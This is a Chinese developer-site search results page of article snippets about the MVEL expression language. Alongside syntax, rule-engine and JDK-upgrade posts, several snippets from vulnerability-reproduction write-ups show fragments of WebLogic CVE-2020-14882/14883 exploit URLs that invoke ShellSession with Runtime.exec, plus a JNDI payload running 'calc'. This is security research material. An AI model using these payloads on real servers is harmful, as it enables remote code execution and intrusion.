- 综合排序
- 最热优先
- 最新优先
- 来自专栏影像技术栈
MVEL2.x模板指南
关于MVEL的语法请参考MVEL 2.x语法指南 MVEL 2.0提供了一个新的,更强大的,统一的模板引擎,汇集了1.2中引入的许多模板概念。 一、MVEL 2.0基本模板 MVEL模板由纯文本文档中的orb-tags组成。 Orb标记表示引擎将在运行时计算模板的动态元素。 如果你熟悉FreeMarker,这种类型的语法将不会完全陌生。 如果你感觉这看起来太乱,你可以使用替代方法,即使用表达式标签,如下所示: @{username}@{'@'}@{domain} 二、MVEL 2.0 Orb标签 本文包含了MVEL 2.0模板引擎中所有开箱即用的 注意:foreach的语法已经在MVEL模板2.0中改变,以使用foreach符号来标记MVEL语言本身的符号。 三、MVEL 2.0模板集成 使用MVEL模板是直接和容易的。 与常规MVEL表达式一样,它们可以解释性地执行,或者预编译并重新用于更快的评估。
2.4K20编辑于 2022-07-14 - 来自专栏影像技术栈
MVEL 2.x语法指南
MVEL 2.x语法指南 MVEL全称为:MVFLEX Expression Language,是用来计算Java语法所编写的表达式值的表达式语言。 除了表达式语言之外,MVEL还用作配置和字符串构造的模板语言。这里还有一个关于MVEL介绍信息的wiki页面是:https://en.wikipedia.org/wiki/MVEL。 MVEL 2.x表达式主要包括以下特性: 属性表达式 布尔表达式 方法调用 变量赋值 函数定义 一、基本语法 MVEL是基于Java语法的表达式语言,具有特定于MVEL的一些明显差异。 与Java不同,MVEL是动态类型化(可选类型化),意味着在源代码中不需要类型限定。 MVEL可以方便的集成到产品中使用。 MVEL甚至可以用来计算布尔表达式: user.name =='John Doe' 与Java一样,MVEL支持所有优先级规则,包括通过括号来控制执行顺序。
3.7K20编辑于 2022-07-14 - 来自专栏SAP Technical
Java各种规则引擎
MVEL用于执行使用Java语法编写的表达式。 2.特性: MVEL是一个功能强大的基于Java应用程序的表达式语言。 目前最新的版本是2.0,具有以下特性: (1). 动态JIT优化器。 迎合主流的需求,MVEL2.0支持基础类型的个性化属性处理器,集成到JIT中。 (5). 更快的模板引擎,支持线性模板定义,宏定义和个性化标记定义。 (6). Jar巨大/依赖规模 3.原理: 与java不同,MVEL是动态类型(带有可选分类),也就是说在源文件中是没有 类型限制的。 一条MVEL表达式,简单的可以是单个标识符,复杂的则可能是 一个充满了方法调用和内部集合创建的庞大的布尔表达式。 4.使用方式: maven引入jar: <dependency> <groupId>org.mvel</groupId> <artifactId>mvel2
5.8K40发布于 2020-11-27 - 来自专栏安恒信息
安恒紧急漏洞预警: ElasticSearch存在远程代码执行漏洞
漏洞信息 漏洞出现在脚本查询模块,默认搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,MVEL会被脚本语言引擎换成Groovy,并且加入了沙盒进行控制,危险的代码会在这里被拦截。 但是安全研究人员发现,沙盒限制存在过滤不严的情况,攻击者可以通过MVEL构造执行任意java代码,导致远程代码执行。
1.5K50发布于 2018-04-10 - 来自专栏凯哥的Java技术活
JVM堆外内存导致的FGC问题排查
这个简单,打开idea,double shift,调search everywhere 排查到是mvel这个依赖框架生成的。 关于mvel,其实是spel差不多,表达式解析引擎。 在项目中,mvel的使用我们只用了两行代码 MVEL.executeExpression() MVEL.compileExpression() 然后我们也有把编译完的进行缓存,按道理说不会一直生成类的。 因为mvel这个框架实在是相关文档太少,没人维护的感觉,抱着死马当活马医的态度,去github上提一个issue,然后自己同时接着排查。 幸运的是这个框架还没死绝,还有人回复。 大概意思是说,我问为什么使用你们的mvel会导致我jvm出现oom错误(频繁的full gc),另外如果说每次编译相同的内容的话,为什么没有框架层面缓存起来。回答说是需要自己缓存的。
98140编辑于 2022-07-08 - 来自专栏静默虚空的博客
JDK 升级问题小结
查找组件用到了 mvel,mvel 为了提高效率进行了字节码优化,正好碰上 JDK8 死穴,所以需要升级。 <dependency> <groupId>org.mvel</groupId> <artifactId>mvel2</artifactId> <version>2.2.7.Final</version
2.2K50发布于 2018-01-05 - 来自专栏码匠的流水账
easy-rules小试牛刀
dependency> <dependency> <groupId>org.jeasy</groupId> <artifactId>easy-rules-mvel </artifactId> <version>3.1.0</version> </dependency> Rule创建方式 基于mvel表达式 easy-rules 首先集成了mvel表达式,后续可能集成SpEL 配置文件 name: "alcohol rule" description: "children are not allowed to buy alcohol doc mvel easy-rules RulesEngine 规则引擎选型及应用 规则引擎之EasyRules expression-language-support
2.2K10发布于 2018-09-17 - 来自专栏White OWL
Weblogic未授权远程命令执行漏洞(CVE-2020-14882&CVE-2020-14883)复现
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime touch%20/tmp/success1');") 反弹shell: 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10版本并不存在com.tangosol.coherence.mvel2 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime
73600编辑于 2022-09-22 - 来自专栏JAVA 框架/源码学习
JDK 从老版本升级到 1.8的问题总结
invalid constant type: 15 at javassist.bytecode.ConstPool.readOne(ConstPool.java:1113) 查找组件用到了 mvel ,mvel 为了提高效率进行了字节码优化,正好碰上 JDK8 死穴,所以需要升级。 <dependency> <groupId>org.mvel</groupId> <artifactId>mvel2</artifactId> <version>2.2.7.Final</version
4.1K10发布于 2021-01-14 - 来自专栏Timeline Sec
CVE-2020-14882&14883:Weblogic RCE复现
_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime _nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime ShellSession利用 com.tangosol.coherence.mvel2.sh.ShellSession就是大佬们找到的类,我们先看看这个类: /dep/coherence-rest.jar /com/tangosol/coherence/mvel2/sh/ShellSession.class 这里尝试使用payload: http://127.0.0.1:7001/console/console.portal _nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime
2.4K10发布于 2020-12-02 - 来自专栏张叔叔讲互联网
人群判存服务是如何实现的
Java语言常用的表达式引擎有MVEL和Aviator。 MVEL是一款功能强大的表达式解析器,支持获取对象属性及方法、支持复杂的if else语句,其性能优越但是资源消耗较大;Avaitor虽然支持的功能不如MVEL完善,但其定位是一个高性能、轻量级的Java 其他引擎一般都是通过解释的方法执行,MVEL和Aviator可以直接将表达式编译成Java字节码并交给JVM执行。下面给出了使用MVEL和Avaitor实现判存逻辑的核心代码。 province", getLabelValue(userId, "province"));map.put("gender", getLabelValue(userId, "gender"));// 通过MVEL 实现表达式判断Boolean mvelResult = (Boolean) MVEL.eval(expression, map);if (mvelResult) {// 判存结果是“是”} else {
81762编辑于 2023-10-24 - 来自专栏用户6296428的专栏
基于Fuzzing和ChatGPT结合的AI自动化测试实践
这里尝试借鉴使用了MVEL模版语言的规则,经过验证,ChatGPT是能够自主理解MVEL模版语言和如何使用该语言的,即使结果不太符合预期,也可以通过 提示 使ChatGPT更加理解我们的需求,并生成准确数据 当然,标准的MVEL语言有自己的编写规范,我们要做的是设定自己的编写方式,目的是降低使用者在撰写推荐入参时的理解成本。 为了让ChatGPT理解什么时候要通过MVEL模版语言进行生成数据,我们通过MVEL()来标记字段,并结合prompt来传达生成规则。 3.2 如果字段内容不是MVEL表达式 3.2.1 生成规则: a. \":\"MVEL(*expression*)\",则认为 value 取值范围为符合 表达式 *expression* 的所有值 4.
4.3K22编辑于 2023-11-09 - 来自专栏LuckySec网络安全
weblogic 权限绕过命令执行漏洞复现
这个漏洞一共有两种利用方法: 第一种方法是通过com.tangosol.coherence.mvel2.sh.ShellSession 第二种方法是通过com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 2.1 第一种方法 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在com.tangosol.coherence.mvel2.sh.ShellSession类。 2.1.1 GET请求方式(无回显) 直接访问如下URL,即可利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令: http://192.168.126.130 _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle=' 'com.tangosol.coherence.mvel2
1.9K60编辑于 2022-11-02 - 来自专栏码字搬砖
java执行 string code
工作当中需要执行 string 类型的 java code ,之前有同事用过 mvel ,调研之后发现太多于重量级了,我就想安安静静的执行一段 java 代码 然后得到返回值。 后来由调研了一下 jexl3 ,相比于 mvel 用起来简单方便还能满足需求。 这里仅仅是 apache-commons-jexl3 的最简单的一个入门。我要达到一个什么样的目的呢?
1.1K30发布于 2020-07-06 - 来自专栏丑胖侠
Drools规则引擎debug模式
首先来说debug的问题,drl文件不是不可以debug但是是有限制的:Eclipse或MyEclipse中安装插件,然后drl文件中的语法还需要是MVEL才可以支持debug。
1.9K20发布于 2020-03-18 - 来自专栏一名白帽的成长史
【漏洞复现】Weblogic漏洞复现:CVE-2020-14882未授权代码执行
_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime _nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime
9.5K30发布于 2020-11-09 - 来自专栏我是攻城师
ElasticSearch命令执行漏洞:通过perl进行反弹shell
Elasticsearch用了两个危险性的脚本MVEL和Groovy。 2014年5月MVEL爆出来命令执行漏洞,这次轮到Groovy了,Elasticsearch 1.3.0-1.3.7 和 1.4.0-1.4.2 的Groovy 脚本引擎存在漏洞。
3.4K90发布于 2018-05-11 - 来自专栏h0cksr的小屋
从羊城杯一道题学习高版本JDK下JNDI的利用
StringRefAddr("forceString", "a=fromXML")); ref.add(new StringRefAddr("a", xml)); return ref; } org.mvel2 .sh.ShellSession#exec 解析MVEL表达式 private static ResourceRef tomcat_MVEL(){ ResourceRef ref = new ResourceRef ("org.mvel2.sh.ShellSession", null, "", "", true, "org.apache.naming.factory.BeanFactory", (){ ResourceRef ref = new ResourceRef("org.mvel2.sh.ShellSession", null, "", "", "push Runtime.getRuntime().exec('calc');")); System.out.println("请检查当前项目是否存在org.mvel2
1.5K150编辑于 2023-05-17 - 来自专栏黑白天安全团队
Weblogic漏洞利用总结
该漏洞有两个利用手法 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令 DNSLOG的使用 DNSLOG可以在某些无法直接利用漏洞获得回显的情况下, 但是目标可以发起DNS _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime 这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10版本并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类 2.利用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext
5.2K20发布于 2021-03-16 - 来自专栏丑胖侠
《Drools7.0.0.Final规则引擎教程》第4章 4.2 activation-group& dialect& date-effective
dialect 该属性用来定义规则(LHS、RHS)当中要使用的语言类型,可选值为“java”或“mvel”。默认情况下使用java语言。 dialect "mvel" date-effective 该属性是用来控制规则只有在到达指定时间后才会触发。
1K100发布于 2018-01-08
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号